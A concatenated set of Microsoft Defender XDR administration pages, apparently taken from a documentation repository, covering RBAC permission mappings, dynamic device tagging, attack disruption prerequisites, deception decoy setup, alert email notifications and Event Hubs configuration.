-|Organization Management|Role group|Security operations \ Security data \ Security data basics (read) </br> Security operations \ Security data \ Alerts (manage) </br> Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br> Security operations \ Security data \ Response (manage) </br> Security operations \ Security data \ Email advanced actions (manage) </br> Security operations \ Security data \ Email quarantine (manage) </br> Authorization and settings \ Authorization (Read and manage) </br> Authorization and settings \ Security setting (All permissions) </br> Authorization and settings \ System settings (Read and manage)|
-|Security Administrator|Role group|Security operations \ Security data \ Security data basics (read) </br>Security operations \ Security data \ Alerts (manage) </br> Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br> Security operations \ Security data \ Response (manage) </br> Security operations \ Security data \ Email quarantine (manage) </br> Authorization and settings \ Authorization (read) </br> Authorization and settings \ Security setting (All permissions) </br> Authorization and settings \ System settings (Read and manage)|
-|Security Reader|Role group|Security operations \ Security data \Security data basics (read) </br> Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br> Security operations \ Security data \ Response (manage) </br> Authorization and settings \ Security settings \ Core security settings (read) </br> Authorization and settings \ System setting (read)|
-|Audit Logs|Role|Security operations \ Security data \ Security data basics (read)|
-|Manage Alerts|Role|Security operations \ Security data \ Security data basics (read) </br> Security operations \ Security data \ Alerts (manage)|
-|Preview|Role|Security operations\ Security operations \ Raw data (Email & collaboration) \ Email content (read)|
-|Quarantine|Role|Security operations \ Security data \ Email quarantine (manage)|
-|Role Management|Role|Authorization and settings \ Authorization (Read and manage)|
-|Search and Purge|Role|Security operations \ Security data \ Email advanced actions (manage)|
-|View-Only Manage Alerts|Role|Security operations \ Security data \ Security data basics (read)|
-|View-Only Recipients|Role|Security operations \ Security data \ Security data basics (read) </br> Security operations \ Raw data (Email & collaboration) \ Email message headers (read)|
-|View-only Audit Logs|Role|Security operations \ Security data \ Security data basics (read)|
-
-#### Exchange Online permissions mapping
-
-You configured protection-related Exchange Online permissions in the Exchange admin center (EAC) at <https://admin.exchange.microsoft.com/#/adminRoles>.
-
-|Exchange Online permission|Type|Microsoft Defender XDR Unified RBAC permission|
-||||
-|Hygiene Management|Role group|Security operations \ Security data \ Email quarantine (manage) </br> Authorization and settings \ Security settings \ Core security settings (manage) </br> Authorization and settings \ Security settings \ Detection tuning (manage)|
-|Organization Management|Role group|Security operations \ Raw data (email & collaboration) \ Email message headers (read) </br> Authorization and settings \ Security settings \ Core security settings (manage) </br> Authorization and settings \ Security settings \ Detection tuning (manage) </br> Authorization and settings \ System settings (Read and manage)|
-|Security Administrator|Role group|Authorization and settings \ Security settings \ Detection tuning (manage) </br> Authorization and settings \ System settings (Read and manage)|
-|View-Only Organization Management|Role group|Authorization and settings \ Security settings (Read-only) </br> Authorization and settings \ System settings (Read-only)|
-|Tenant AllowBlockList Manager|Role|Authorization and settings \ Security settings \ Detection tuning (manage)|
-|View-only Recipients|Role|Security operations \ Raw data (email & collaboration) \ Email message headers (read)|
-
-<a name='map-microsoft-defender-for-identity-permissions-to-the-microsoft-365-defender-unified-rbac-permissions'></a>
-
-### Map Microsoft Defender for Identity permissions to the Microsoft Defender XDR Unified RBAC permissions
-
-|Defender for Identity permission|Unified RBAC permission|
-||||
-|MDI admin|Security operations \ Security data \ Security data basics (read)</br>Security operations \ Security data \ Alerts (manage)</br>Authorization and settings \ Authorization (Read and manage) </br>Authorization and settings \ Security setting (All permissions) </br>Authorization and settings \ System settings (Read and manage)|
-|MDI user|Security operations \ Security data \ Security data basics (read) </br>Security operations \ Security data \ Alerts (manage)</br>Authorization and settings \ Security setting (All permissions) </br>Authorization and settings \ System setting (read)|
-|MDI viewer|Security operations \ Security data \ Security data basics (read)</br>Authorization and settings \ Security settings \ Core security settings (read) </br>Authorization and settings \ System setting (read)|
-
-> [!NOTE]
-> Defender for Identity experiences will also adhere to permissions granted from [Microsoft Defender for Cloud Apps](https://security.microsoft.com/cloudapps/permissions/roles). For more information, see [Microsoft Defender for Identity role groups](https://go.microsoft.com/fwlink/?linkid=2202729).
-> Exception: If you have configured [Scoped deployment](/defender-cloud-apps/scoped-deployment) for Microsoft Defender for Identity alerts in the Microsoft Defender for Cloud Apps portal, these permissions do not carry over. You need to explicitly grant the Security operations \ Security data \ Security data basics (read) permissions for the relevant portal users.
-<a name='azure-active-directory-global-roles-access'></a>
-
-### Microsoft Entra Global roles access
-
-Users assigned with Microsoft Entra global roles may also have access to the [Microsoft Defender portal](https://security.microsoft.com).
-
-Use this table to learn about the permissions assigned by default for each workload (Defender for Endpoint, Defender Vulnerability Management, Defender for Office and Defender for Identity) in Microsoft Defender XDR Unified RBAC to each global Microsoft Entra role.
-
-|Microsoft Entra role|Microsoft Defender XDR Unified RBAC assigned permissions for all workloads|Microsoft Defender XDR Unified RBAC assigned permissions ΓÇô workload specific|
-|||||
-|Global administrator|Security operations \ Security data \ Security data basics (read)</br>Security operations \ Security data \ Alerts (manage) </br>Security operations \ Security data \ Response (manage)</br>Security posture \ Posture management \ Secure Score (read) </br> Security posture \ Posture management \ Secure Score (manage)</br>Authorization and settings \ Authorization (Read and manage)</br>Authorization and settings \ Security settings (All permissions)</br>Authorization and settings \ System settings (Read and manage) |_**Defender for Endpoint and Defender Vulnerability Management permissions only permissions**_ </br>Security operations \ Basic live response (manage)</br>Security operations \ Advanced live response (manage) </br> Security operations \ Security data \ File collection (manage) </br>Security posture \ Posture management \ Vulnerability management (read)</br>Security posture \ Posture management \ Exception handling (manage)</br>Security posture \ Posture management \ Remediation handling (manage)</br>Security posture \ Posture management \ Application handling (manage)</br>Security posture \ Posture management \ Security baseline assessment (manage)</br></br> _**Defender for Office only permissions**_ </br> Security operations \ Security data \ Email quarantine (manage)</br>Security operations \ Security data \ Email advanced actions (manage)</br>Security operations \ Raw data (Email & collaboration) \ Email message headers (read)|
-|Security administrator|Same as Global administrator|Same as Global administrator|
-|Global reader|Security operations \ Security data \ Security data basics (read)</br>Security posture \ Posture management \ Secure Score (read) </br>|_**Defender for Endpoint and Defender Vulnerability Management permissions only permissions**_ </br>Security posture \ Posture management \ Vulnerability management (read)</br></br> _**Defender for Office only permissions**_ </br> Security operations \ Security data \ Response (manage)</br>Security operations \ Raw data (Email & collaboration) \ Email message headers (read)</br>Authorization and settings \ Authorization (read) </br></br>_**Defender for Office and Defender for Identity only permissions**_ </br>Authorization and settings \ Security settings \ Core security settings (read)</br>Authorization and settings \ System settings (read)|
-|Security reader|Security operations \ Security data \ Security data basics (read)</br>Security posture \ Posture management \ Secure Score (read) </br>|_**Defender for Endpoint and Defender Vulnerability Management permissions only permissions**_ </br>Security posture \ Posture management \ Vulnerability management (read)</br></br> _**Defender for Office only permissions**_ </br> Security operations \ Security data \ Response (manage)</br>Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br></br>_**Defender for Office and Defender for Identity only permissions**_ </br>Authorization and settings \ Security settings \ Core security settings (read)</br>Authorization and settings \ System settings (read)|
-|Security operator|Security operations \ Security data \ Security data basics (read)</br>Security operations \ Security data \ Alerts (manage) </br>Security operations \ Security data \ Response (manage)</br>Security posture \ Posture management \ Secure Score (read)</br>Authorization and settings \ Security settings (All permissions)|_**Defender for Endpoint and Defender Vulnerability Management permissions only permissions**_</br>Security operations \ Security data \ Basic live response (manage)</br>Security operations \ Security data \ Advanced live response (manage)</br> Security operations \ Security data \ File collection (manage) </br>Security posture \ Posture management \ Vulnerability management (read)</br>Security posture \ Posture management \ Exception handling (manage)</br>Security posture \ Posture management \ Remediation handling (manage)</br></br>_**Defender for Office only permissions**_ </br>Security operations \ Raw data (Email & collaboration) \ Email message headers (read)</br>Authorization and settings \ System settings (Read and manage)</br></br>_**Defender for Identity only permissions**_ </br>Authorization and settings \ System settings (read)|
-|Exchange Administrator|Security posture \ Posture management \ Secure Score (read) </br> Security posture \ Posture management \ Secure Score (manage) |_**Defender for Office only permissions**_ </br>Security operations \ Security data \ Security data basic (read) </br>Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br>Authorization and settings \ System settings (Read and manage)|
-|SharePoint Administrator|Security posture \ Posture management \ Secure Score (read) </br> Security posture \ Posture management \ Secure Score (manage)|not applicable|
-|Service Support Administrator|Security posture \ Posture management \ Secure Score (read) |not applicable|
-|User Administrator|Security posture \ Posture management \ Secure Score (read) |not applicable|
-|HelpDesk Administrator|Security posture \ Posture management \ Secure Score (read) |not applicable|
-|Compliance administrator|not applicable|_**Defender for Office only permissions**_ </br> Security operations \ Security data \ Security data basics (read)</br> Security operations \ Security data \ Alerts (manage)|
-|Compliance data administrator|not applicable|Same as Compliance administrator|
-|Billing admin|not applicable|not applicable|
-
-> [!NOTE]
-> By activating the Microsoft Defender XDR Unified RBAC model, users with Security reader and Global reader roles will have access to Defender for Endpoint data.
-
-## Next steps
--- [Import existing RBAC roles](import-rbac-roles.md)-- [Activate Microsoft Defender XDR Unified RBAC](activate-defender-rbac.md)
security Configure Asset Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-asset-rules.md
- Title: Asset rule management - Dynamic rules
-description: You can use Microsoft Defender for Endpoint to configure dynamic tagging
------- m365-security-- tier2- Previously updated : 07/11/2023--
-# Asset rule management - Dynamic rules for devices
-
-> [!IMPORTANT]
-> Some information in this article relates to prereleased products/services that might be substantially modified before they are commercially released. Microsoft makes no warranties, express or implied, for the information provided here.
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-Maintaining an accurate inventory of devices in a constantly changing corporate environment is a critical task for security and IT teams. Failing to effectively manage device context, such as device value and tags, which many organizations use in their security workflows can lead to security vulnerabilities.
-
-Devices may require updates, replacements, or reconfigurations due to changing business needs. This can create a significant challenge for security and IT teams who are responsible for the ongoing management of the device inventory, and ensuring devices are effectively tracked and managed over time.
-
-Dynamic rules can help manage device context by assigning tags and device values automatically based on certain criteria. This will save time and ensure accuracy. For example, tagging devices with a specific OS version or assigning a value to devices with a particular naming convention. Dynamic rules also ensure devices remain relevant by removing tags or updating values when criteria are no longer met.
-
-## Create a new dynamic rule
-
-A rule can be based on device name, domain, OS platform, internet facing status, onboarding status and manual device tags. You can select or create a tag that will be applied based on the conditions you've set.
-
-The following steps guide you on how to create a new dynamic rule in Microsoft Defender XDR:
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) as a user who can view and perform actions on all devices.
-2. In the navigation pane, select **Settings** \> **Microsoft Defender XDR** \> **Asset Rule Management**.
-3. Select **Create a new rule**.
-4. Enter a **Rule name** and **Description***.
-5. Select **Next** to choose the conditions you want to assign:
--
-6. Select **Next** and choose the tag to apply to this rule.
--
-7. Select **Next** to review and finish creating the rule and then select **Submit**.
-
->[!Note]
-> It may take up to 1 hour for changes to be reflected in the portal.
-
-### Dynamic tags in the Device Inventory
-
-You can see the dynamic tags assigned in the Device Inventory view.
-
-To see tags on individual devices:
-
-1. Select **Devices** from the **Assets** navigation menu in the [Microsoft Defender portal](https://security.microsoft.com).
-2. In the **Device Inventory** page, select the device name that you want to view.
-3. Select **Manage tags**.
--
-### Updating rules
-
-Dynamic tags and device values set by dynamic rules can't be manually updated. To edit, delete or turn off a rule, in the **Asset Rule Management** page select the rule and choose the action you wish to take:
-
security Configure Attack Disruption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-attack-disruption.md
- Title: Configure automatic attack disruption capabilities in Microsoft Defender XDR
-description: Configure automatic attack disruption options in Microsoft Defender XDR
----- Previously updated : 04/04/2024--- m365-security-- tier2--- autoir-- admindeeplinkDEFENDER---
-# Configure automatic attack disruption capabilities in Microsoft Defender XDR
--
-Microsoft Defender XDR includes powerful [automated attack disruption](automatic-attack-disruption.md) capabilities that can protect your environment from sophisticated, high-impact attacks.
-
-This article describes how to configure automatic attack disruption capabilities in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> with these steps:
-
-1. [Review the prerequisites](#prerequisites-for-automatic-attack-disruption-in-microsoft-365-defender).
-2. [Review or change the automated response exclusions for users](#review-or-change-automated-response-exclusions-for-users).
-
-Then, after you're all set up, you can view and manage containment actions in Incidents and the Action center. And, if necessary, you can make changes to settings.
-
-<a name='prerequisites-for-automatic-attack-disruption-in-microsoft-365-defender'></a>
-
-## Prerequisites for automatic attack disruption in Microsoft Defender XDR
-
-|Requirement|Details|
-|||
-|Subscription requirements|One of these subscriptions: <ul><li>Microsoft 365 E5 or A5</li><li>Microsoft 365 E3 with the Microsoft 365 E5 Security add-on</li><li>Microsoft 365 E3 with the Enterprise Mobility + Security E5 add-on</li><li>Microsoft 365 A3 with the Microsoft 365 A5 Security add-on</li><li>Windows 10 Enterprise E5 or A5</li><li>Windows 11 Enterprise E5 or A5</li><li>Enterprise Mobility + Security (EMS) E5 or A5</li><li>Office 365 E5 or A5</li><li>Microsoft Defender for Endpoint</li><li>Microsoft Defender for Identity</li><li>Microsoft Defender for Cloud Apps</li><li>Defender for Office 365 (Plan 2)</li><li>Microsoft Defender for Business</li></ul> <p> See [Microsoft Defender XDR licensing requirements](./prerequisites.md#licensing-requirements).|
-|Deployment requirements|<ul><li>Deployment across Defender products (e.g., Defender for Endpoint, Defender for Office 365, Defender for Identity, and Defender for Cloud Apps)</li><ul><li>The wider the deployment, the greater the protection coverage is. For example, if a Microsoft Defender for Cloud Apps signal is used in a certain detection, then this product is required to detect the relevant specific attack scenario.</li><li>Similarly, the relevant product should be deployed to execute an automated response action. For example, Microsoft Defender for Endpoint is required to automatically contain a device. </li></ul><li>Microsoft Defender for Endpoint's device discovery is set to 'standard discovery'</li></ul>|
-|Permissions|To configure automatic attack disruption capabilities, you must have one of the following roles assigned in either Microsoft Entra ID (<https://portal.azure.com>) or in the Microsoft 365 admin center (<https://admin.microsoft.com>): <ul><li>Global Administrator</li><li>Security Administrator</li></ul>To work with automated investigation and response capabilities, such as by reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](m365d-action-center.md#required-permissions-for-action-center-tasks).|
-
-### Microsoft Defender for Endpoint Prerequisites
-
-#### Minimum Sense Client version (MDE client)
-
-The Minimum Sense Agent version required for the **Contain User** action to work is v10.8470. You can identify the Sense Agent version on a device by running the following PowerShell command:
-
-> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Advanced Threat Protection\' -Name "InstallLocation"
-
-#### Automation setting for your organizations devices
-
-Review the configured automation level for your device group policies, wWhether automated investigations run, and whether remediation actions are taken automatically or only upon approval for your devices depend on certain settings. You must be a global administrator or security administrator to perform the following procedure:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** \> **Endpoints** \> **Device groups** under **Permissions**.
-
-3. Review your device group policies. Look at the **Automation level** column. We recommend using **Full - remediate threats automatically**. You might need to create or edit your device groups to get the level of automation you want. To exclude a device group from automated containment, set its automation level to **no automated response**. Note that this is not highly recommended and should only be done for a limited number of devices.
-
-#### Device discovery configuration
-
-Device discovery settings must be activated to "Standard Discovery" at a minimum. Learn how to configure device discovery in [Set up device discovery](/microsoft-365/security/defender-endpoint/configure-device-discovery).
-
->[!NOTE]
->Attack disruption can act on devices independent of a device's Microsoft Defender Antivirus operating state. The operating state can be in Active, Passive, or EDR Block Mode.
-
-### Microsoft Defender for Identity Prerequisites
-
-#### Set up auditing in domain controllers
-
-Learn how to set up auditing in domain controllers in [Configure audit policies for Windows event logs](/defender-for-identity/deploy/configure-windows-event-collection) to ensure that required audit events are configured on the domain controllers where the Defender for Identity sensor is deployed.
-
-#### Configure action accounts
-
-Defender for Identity allows you to take remediation actions targeting on-premises Active Directory accounts in the event that an identity is compromised. To take these actions, Defender for Identity needs to have the required permissions to do so. By default, the Defender for Identity sensor impersonates the LocalSystem account of the domain controller and performs the actions. Since the default can be changed, validate that Defender for Identity has the required permissions.
-
-You can find more information on the action accounts in [Configure Microsoft Defender for Identity action accounts](/defender-for-identity/deploy/manage-action-accounts)
-
-The Defender for Identity sensor needs to be deployed on the domain controller where the Active Directory account is to be turned off.
-
->[!NOTE]
->If you have automations in place to activate or block a user, check if the automations can interfere with Disruption. For example, if there is an automation in place to regularly check and enforce that all active employees have enabled accounts, this could unintentionally activate accounts that were deactivated by attack disruption while an attack is detected.
-
-### Microsoft Defender for Cloud Apps prerequisites
-
-#### Microsoft Office 365 Connector
-
-Microsoft Defender for Cloud Apps must be connected to Microsoft Office 365 through the connector. To connect Defender for Cloud Apps, see [Connect Microsoft 365 to Microsoft Defender for Cloud Apps](/defender-cloud-apps/protect-office-365#connect-microsoft-365-to-microsoft-defender-for-cloud-apps).
-
-#### App Governance
-
-App Governance must be turned on. Refer to the [app governance documentation](/defender-cloud-apps/app-governance-get-started) to turn it on.
-
-### Microsoft Defender for Office 365 prerequisites
-
-#### Mailboxes location
-
-Mailboxes are required to be hosted in Exchange Online.
-
-#### Mailbox audit logging
-
-The following mailbox events need to be audited by minimum:
--- MailItemsAccessed-- UpdateInboxRules-- MoveToDeletedItems-- SoftDelete-- HardDelete-
-Review [manage mailbox auditing](/purview/audit-mailboxes) to learn about managing mailbox auditing.
-
-#### Safelinks policy needs to be present.
-
-## Review or change automated response exclusions for users
-
-Automatic attack disruption enables the exclusion of specific user accounts from automated containment actions. Excluded users won't be affected by automated actions triggered by attack disruption. You must be a global administrator or security administrator to perform the following procedure:
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** \> **Microsoft Defender XDR** \> **Identity automated response**. Check the user list to exclude accounts.
-
-3. To exclude a new user account, select **Add user exclusion**.
-
-Excluding user accounts is not recommended, and accounts added to this list won't be suspended in all supported attack types like business email compromise (BEC) and human-operated ransomware.
-
-## Next steps
--- [View details and results](autoad-results.md)-- [Get email notifications for response actions](m365d-response-actions-notifications.md)-
-## See also
--- [Automatic attack disruption in Microsoft Defender XDR](automatic-attack-disruption.md)-- [Automatic attack disruption for SAP](/azure/sentinel/sap/deployment-attack-disrupt)-
security Configure Deception https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-deception.md
- Title: Configure the deception capability in Microsoft Defender XDR
-description: Learn how to create, edit, and delete deception rules in Microsoft Defender XDR.
--- NOCSH------ m365-security-- tier1--- MOE150-- MET150 Previously updated : 01/12/2024--
-# Configure the deception capability in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!NOTE]
-> The built-in [deception](deception-overview.md) capability in Microsoft Defender XDR covers all Windows clients onboarded to Microsoft Defender for Endpoint. Learn how to onboard clients to Defender for Endpoint in [Onboard to Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/onboarding).
-
-Microsoft Defender XDR has [deception technology](deception-overview.md) built in to protect your environment from high-impact attacks that use human-operated lateral movement. This article describes how to configure the deception capability in Microsoft Defender XDR.
-
-## Turn on the deception capability
-
-The deception capability is turned off by default. To turn it on, perform the following steps:
-
-1. Select **Settings** > **Endpoints**.
-2. Under **General**, select **Advanced features**.
-3. Look for **Deception capabilities** and toggle the switch to **On**.
--
-A default rule is automatically created and turned on when the deception capability is enabled. The default rule, which you can edit accordingly, automatically generates decoy accounts and hosts that are integrated into lures and plants these to all target devices in the organization. While the deception feature's scope is set to all devices in the organization, lures are planted in Windows client devices only.
--
-## Create and modify deception rules
-
-> [!NOTE]
-> Microsoft Defender XDR currently supports the creation of up to ten (10) deception rules.
-
-To create a deception rule, perform the following steps:
-
-1. Navigate to **Settings** > **Endpoints**. Under **Rules**, select **Deception rules**.
-2. Select **Add deception rule**.
-3. In the rule creation pane, add a rule name, description, and select what lure types to create. You can select both [Basic and Advanced](deception-overview.md#how-does-the-microsoft-defender-xdr-deception-capability-work) lure types.
-4. Identify the devices where you intend to plant the lures in the scope section. You can select to plant lures in all Windows client devices or in clients with specific tags. The deception feature currently covers Windows clients.
-5. The deception capability then takes a few minutes to automatically generates decoy accounts and hosts. Note that the deception capability generates decoy accounts that mimic the User Principal Name (UPN) in Active Directory.
-6. You can review, edit, or delete automatically generated decoys. You can also add your own decoy accounts and hosts in this section. To prevent false positive detections, ensure that added hosts/IP addresses aren't used by the organization.
-7. You can edit a decoy account name, host name, and the IP address where the lures are planted in the decoys section. When adding IP addresses, we recommend using a sandbox IP if it exists in the organization. Avoid using commonly used addresses, for example, *127.0.0.1*, *10.0.0.1*, and the like.
-
-> [!CAUTION]
-> To avoid false positive alerts, we highly recommend creating unique user accounts and host names when creating and editing decoy accounts and hosts. Ensure that created user accounts and hosts are unique for each deception rule and that these accounts and hosts do not exist in the organization's directory.
-
-8. Identify if you use autogenerated or custom lures in the lures section. Select **add new lure** under **Use custom lures only** to upload your own lure. Custom lures can be any file type (except .DLL and .EXE files) and are limited to 10 MB each. When creating and uploading custom lures, we recommend lures to contain or mention the fake hosts or fake user accounts generated in the previous steps to ensure that lures are attractive to attackers.
-9. Provide a lure name and a path where the lure will be planted. You can then select to plant the lure on all devices covered in the scope section and if you want the lure to be planted as a hidden file. If these boxes are left unchecked, the deception feature automatically plants the lures unhidden into random devices within the scope.
-10. Review the details of the created rule in the summary section. You can edit the rule details by selecting Edit on the section that you need to modify. Select **Save** after reviewing.
-11. The new rule appears in the Deception rules pane after successful creation. It takes approximately 12-24 hours to complete the rule creation. Check the *Status* to monitor the rule creation progress.
-12. To check on the details of active rules, including details of devices covered and planted decoys and lures, select Export in the rules pane.
-
-To modify a deception rule, perform the following steps:
-
-1. Select the rule to modify in the Deception rules pane.
-2. Select **Edit** on the rule details pane.
-3. To turn off the rule, select **Turn off** in the editing pane.
-4. To delete a deception rule, select **Delete** in the editing pane.
-
security Configure Email Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-email-notifications.md
- Title: Configure alert notifications in Microsoft Defender XDR
-description: You can use Microsoft Defender for Endpoint to configure email notification settings for security alerts, based on severity and other criteria.
------- m365-security-- tier2- Previously updated : 10/11/2023--
-# Configure alert notifications in Microsoft Defender XDR
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-You can configure Microsoft Defender XDR to send email notifications to specified recipients for new alerts. This feature enables you to identify a group of individuals who will immediately be informed and can act on alerts based on their severity.
-
-If you're using [Defender for Business](../defender-business/mdb-overview.md), you can set up email notifications for specific users (not roles or groups).
-
-> [!NOTE]
-> - Only users with 'Manage security settings' permissions can configure email notifications. If you've chosen to use basic permissions management, users with Security Administrator or Global Administrator roles can configure email notifications.
-> - Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-You can set the alert severity levels that trigger notifications. You can also add or remove recipients of the email notification. New recipients get notified about alerts triggered after they're added. For more information about alerts, see [View and organize the Alerts queue](../defender-endpoint/alerts-queue.md).
-
-If you're using role-based access control (RBAC), recipients will only receive notifications based on the device groups that were configured in the notification rule. Users with the proper permission can only create, edit, or delete notifications that are limited to their device group management scope. Only users assigned to the Global administrator role can manage notification rules that are configured for all device groups.
-
-The email notification includes basic information about the alert and a link to the portal where you can do further investigation.
-
-## Create rules for alert notifications
-You can create rules that determine the devices and alert severities to send email notifications for and the notification recipients.
-
-1. Go to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) and sign in using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **General** \> **Email notifications**.
-
-2. Click **Add item**.
-
-3. Specify the General information:
- - **Rule name** - Specify a name for the notification rule.
- - **Include organization name** - Specify the customer name that appears on the email notification.
- - **Include tenant-specific portal link** - Adds a link with the tenant ID to allow access to a specific tenant.
- - **Include device information** - Includes the device name in the email alert body.
-
- > [!NOTE]
- > This information might be processed by recipient mail servers that are not in the geographic location you have selected for your Defender data.
-
- - **Devices** - Choose whether to notify recipients for alerts on all devices (Global administrator role only) or on selected device groups. For more information, see [Create and manage device groups](../defender-endpoint/machine-groups.md). (If you're using [Defender for Business](../defender-business/mdb-overview.md), device groups do not apply.)
- - **Alert severity** - Choose the alert severity level.
-
-4. Click **Next**.
-
-5. Enter the recipient's email address then click **Add recipient**. You can add multiple email addresses.
-
-6. Check that email recipients can receive the email notifications by selecting **Send test email**.
-
-7. Click **Save notification rule**.
-
-## Edit a notification rule
-
-1. Select the notification rule you'd like to edit.
-
-2. Update the General and Recipient tab information.
-
-3. Click **Save notification rule**.
-
-## Delete notification rule
-
-1. Select the notification rule you'd like to delete.
-
-2. Click **Delete**.
-
-## Troubleshoot email notifications for alerts
-
-This section lists various issues that you may encounter when using email notifications for alerts.
-
-**Problem:** Intended recipients report they're not getting the notifications.
-
-**Solution:** Make sure that the notifications aren't blocked by email filters:
-
-1. Check that the email notifications aren't sent to the Junk Email folder. Mark them as Not junk.
-2. Check that your email security product isn't blocking the email notifications.
-3. Check your email application rules that might be catching and moving your email notifications.
-
-## Related topics
--- [Update data retention settings](../defender-endpoint/data-retention-settings.md)-- [Configure advanced features](../defender-endpoint/advanced-features.md)-- [Configure vulnerability email notifications](../defender-endpoint/configure-vulnerability-email-notifications.md)
security Configure Event Hub https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/configure-event-hub.md
- Title: Configure your Event Hubs
-description: Learn how to configure your Event Hubs
--- NOCSH------ m365-security-- tier2-- Previously updated : 02/08/2023--
-# Configure your Event Hubs
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-Learn how to configure your Event Hubs so that it can ingest events from Microsoft Defender XDR.
-
-## Set up the required Resource Provider in the Event Hubs subscription
-
-1. Sign in to the [Azure portal](https://portal.azure.com).
-1. Select **Subscriptions** > **{ Select the subscription the event hubs will be deployed to }** > **Resource providers**.
-1. Verify whether the **Microsoft.Insights** Provider is registered. Otherwise, register it.
--
-<a name='set-up-azure-active-directory-app-registration'></a>
-
-## Set up Microsoft Entra App Registration
-
-> [!NOTE]
-> You must have Administrator role or Microsoft Entra ID must be set to allow non-Administrators to register apps. You must also have an Owner or User Access Administrator role to assign the service principal a role. For more information, see [Create a Microsoft Entra app & service principal in the portal - Microsoft identity platform \| Microsoft Docs](/azure/active-directory/develop/howto-create-service-principal-portal).
-
-1. Create a new registration (which inherently creates a service principal) in
-**Microsoft Entra ID** \> **App registrations** \> **New registration.**
-
-1. Fill out the form with just the Name (no Redirect URI is required).
-
- :::image type="content" source="../../media/336bc84e6be23900c43232b4ef0c253c.png" alt-text="The application name display section in the Microsoft Azure portal" lightbox="../../media/336bc84e6be23900c43232b4ef0c253c.png":::
--
- :::image type="content" source="../../media/06ac04c4ff713c2065cec2ef2f99a294.png" alt-text="The Overview information section in the Microsoft Azure portal" lightbox="../../media/06ac04c4ff713c2065cec2ef2f99a294.png":::
-
-1. Create a secret by clicking on **Certificates & secrets** \> **New client secret**:
-
- :::image type="content" source="../../media/d2ef88d3d2310d2c60c294b569cdf02e.png" alt-text="The Client secret section in the Microsoft Azure portal" lightbox="../../media/d2ef88d3d2310d2c60c294b569cdf02e.png":::
-
-This client secret value is used by Microsoft Graph APIs to authenticate this application that is being registered.
-
-> [!WARNING]
-> **You won't be able to access the client secret again so make sure to save it**.
-
-## Set up Event Hubs namespace
-
-1. Create an Event Hubs Namespace:
-
- Go **to Event Hub \> Add** and select the pricing tier, throughput units and Auto-Inflate (requires standard pricing and under features) appropriate for the load you're expecting. For more information, see [Pricing - Event Hubs \| Microsoft Azure](https://azure.microsoft.com/pricing/details/event-hubs/).
-
- > [!NOTE]
- > You can use an existing event-hub, but the throughput and scaling are set at the namespace level so it is recommended to place an event-hub in its own namespace.
-
- :::image type="content" source="../../media/ebc4ca37c342ad1da75c4aee4018e51a.png" alt-text="The event hubs section in the Microsoft Azure portal" lightbox="../../media/ebc4ca37c342ad1da75c4aee4018e51a.png":::
-
-1. You'll also need the Resource ID of this Event Hubs Namespace. Go to your Azure Event Hubs namespace page \> Properties. Copy the text under Resource ID and record it for use during the Microsoft 365 Configuration section below.
-
- :::image type="content" source="../../media/759498162a4e93cbf17c4130d704d164.png" alt-text="The event hubs properties section in the Microsoft Azure portal" lightbox="../../media/759498162a4e93cbf17c4130d704d164.png":::
-
-### Add permissions
-
-You're required to add permissions to the following roles to entities that are involved in Event Hubs data management:
--- **Contributor**: The permissions related to this role are added to entity who logs in to the Microsoft Defender portal.-- **Reader** and **Azure Event Hub data Receiver**: The permissions related to these roles are assigned to the entity who is already assigned the role of a **Service Principal** and logs in to the Microsoft Entra application.-
-To ensure that these roles have been added, perform the following step:
-
-Go to **Event Hub Namespace** \> **Access Control (IAM)** \> **Add** and verify under **Role assignments**.
--
-## Set up Event Hubs
-
-**Option 1:**
-
-You can create an Event Hubs within your Namespace and **all** the Event Types (Tables) you select to export will be written into this **one** Event Hub.
-
-**Option 2:**
-
-Instead of exporting all the Event Types (Tables) into one Event Hub, you can export each table into different Event Hubs inside your Event Hubs Namespace (one Event Hub per Event Type).
-
-In this option, Microsoft Defender XDR will create Event Hubs for you.
-
-> [!NOTE]
